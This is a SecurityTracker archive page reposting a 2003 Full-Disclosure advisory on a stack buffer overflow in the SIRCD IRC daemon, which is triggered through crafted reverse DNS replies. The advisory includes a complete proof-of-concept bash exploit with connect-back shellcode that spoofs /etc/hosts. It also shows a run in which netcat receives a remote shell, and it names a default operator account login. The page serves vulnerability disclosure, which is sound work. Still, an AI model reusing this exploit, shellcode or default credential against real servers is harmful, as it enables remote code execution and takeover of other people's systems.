SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Instant Messaging/IRC/Chat)  >  SIRCD Vendors:  sircd.org
SIRCD IRC Daemon Buffer Overflow Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1006155
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 23 2003
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 0.4.6 and prior versions
Description:  A buffer overflow vulnerability was reported in the Smart IRC Daemon (SIRCD). A remote user can execute arbitrary code on the server.

It is reported that the software does not properly check the bounds of user-supplied input. When the software performs a reverse DNS lookup, the DNS server can reportedly supply a specially crafted response of the following format to trigger a stack overflow and execute arbitrary code on the target server:

[94 bytes of crap][EBP ][EIP ][400 bytes for nops and shellcode]

A demonstration exploit script is provided in the Source Message.
Impact:  A remote user with control of a DNS server or the ability to spoof the DNS can cause arbitrary code to be executed on the target server.
Solution:  The vendor has released a fixed version, available via CVS:

http://cvs.quakenet.org/cgi-bin/cvsweb.cgi/?hidenonreadable=1&f=h&hidecvsroot=1&logsort=date&sortby=file&hid eattic=1&cvsroot=sircd

A copy of the current CVS version (as of 4 Feb 2003) is available. It is reported to be the pre-release 0.5.0 tree:

http://www.sircd.org/files/sircd-cvs.tar.gz
Vendor URL:  www.sircd.org/ (Links to External Site)
Cause:  Boundary error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  <kain@ircop.dk>
Message History:   None.

 Source Message Contents
Date:  Sun, 23 Feb 2003 20:56:32 +0100
From:  =?iso-8859-1?Q?Knud_Erik_H=F8jgaard?= <kain@ircop.dk>
Subject:  [Full-Disclosure] sircd proof-of-concept / advisory

 

This is a multi-part message in MIME format.

------=_NextPart_000_00EC_01C2DB7E.0BC81760
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Attached documents explain all.

This is also available from http://kokanins.homepage.dk
------=_NextPart_000_00EC_01C2DB7E.0BC81760
Content-Type: application/octet-stream;
	name="sircd.sh"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
	filename="sircd.sh"

#!/usr/local/bin/bash
# /usr/ports/irc/sircd ; sircd v0.4.0; FreeBSD 4.7-RELEASE-p2
# shellcode=3Dconnect back to port 10000 shellcode (72 bytes) by bighawk
# lousy script by knud
echo -e "\nsircd 0.4.0 proof-of-concept, usage $0 <ip-of-attacker>\n"

# assign variables
attackerip=3D$1
filler=3D`perl -e 'print "B" x 94'`
returnaddress=3D`perl -e '$i=3Dpack("l",0xbfafec04);print $i'`
egg=3D`perl -e 'print "\x90" x 328 . =
"\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68\x7f=
\x01\x01\x01\x66\x68\x27\x10\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\=
x62\xcd\x80\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x=
2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80"'`=

attackstring=3D`echo "$filler$returnaddress$returnaddress$egg"` #read->  =
                         127.0.0.1^^^^^^^^^^^^^^^

# need uid=3D0 to modify /etc/hosts=20
if [ $UID -gt 0 ];=20
then               =20
echo "UID =3D $UID, !=3D 0, cannot continue";=20
else=20
echo "UID check passed, backing up /etc/hosts"
# if we end up here all is well
cp /etc/hosts /etc/hosts.$$
echo -e "$attackerip\t$attackstring\t$attackstring" > /etc/hosts
echo -e "Now connect to the sircd from $attackerip"
echo -e "Press a key and enter to restore /etc/hosts"
read restore
if [ $restore =3D "" ];
then cp /etc/hosts.$$ /etc/hosts
else cp /etc/hosts.$$ /etc/hosts
echo "Game over man, game over"
fi
fi
------=_NextPart_000_00EC_01C2DB7E.0BC81760
Content-Type: text/plain;
	name="sircd.txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
	filename="sircd.txt"

I. BACKGROUND

According to the vendor "The 'sircd' project started as an idea from
the QuakeNet IRC Network coding team to develop a completely new irc
server that had none of the problems of the original ircd, such as
instability, scalability issues, redundant, badly written code and
other nasty things. "
More info is available at http://www.sircd.org.

II. DESCRIPTION

a: Insufficient bounds checking leads to execution of arbitrary code.=20
b: Default oper account matching *!*@*

III. ANALYSIS

a:
Upon checking the reverse dns of a connecting user, if the returned
value is longer than a certain length a classic stack overflow occurs.

The buffer may be constructed as such:
[94 bytes of crap][EBP ][EIP ][400 bytes for nops and shellcode],
leaving us with plenty of space both before and after eip to store our
shellcode.=20

The accompanying .sh script is a silly proof of concept.=20
Below is a fabricated copy of a typical run:

[shell 1]
$ nc -l -v -p 10000
listening on [any] 10000 ...

[shell 2]
# ./sircd.sh 127.0.0.1

sircd 0.4.0 proof-of-concept, usage ./sircd.sh <ip-of-attacker>

UID check passed, backing up /etc/hosts
Now connect to the sircd from 127.0.0.1
Press a key and enter to restore /etc/hosts
asd
Game over man, game over
 

[shell 3]
$ sircd &
[1] 75711
 

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
 sircd:  v0.4.0 Alpha
 Author(s)
   Zarjazz (zarjazz@barrysworld.com)
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
sircd initialized
SSL initialized

$ BitchX 127.0.0.1
[snip some bitchx output]
[fi]  *** Welcome to the_server
[fi]  *** Resolving IP 127.0.0.1
--from here on the connection freezes.

[shell 2]
fah
Game over man, game over
 

[shell 1]
connect to [127.0.0.1] from [garbage snipped] [127.0.0.1] 1869
id
uid=3D1001(sircd-user) gid=3D1001(sircd-user) groups=3D1001(sircd-user)

b: type /oper bod bod bod in a connected irc-client.

IV. DETECTION

sircd-0.4.0 shipping with FreeBSD ports as per 03/02-03 is found
to be vulnerable, as well as sircd-0.4.4 from CVS before 04/02-03.

V. WORKAROUND

The fix has been incorporated in the CVS tree as per 04/02-03.

VI. VENDOR FIX

Same as above.

VII. CVE INFORMATION

unknown

VIII. DISCLOSURE TIMELINE

03/02-02 zarjazz@barrysworld.com,ports@freebsd.org notified.
04/02-02 zarjazz@barrysworld.com responded with a fix.
04/02-02 public disclosure.

IX. CREDIT

Knud Erik H=F8jgaard

------=_NextPart_000_00EC_01C2DB7E.0BC81760--

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2002, SecurityGlobal.net LLC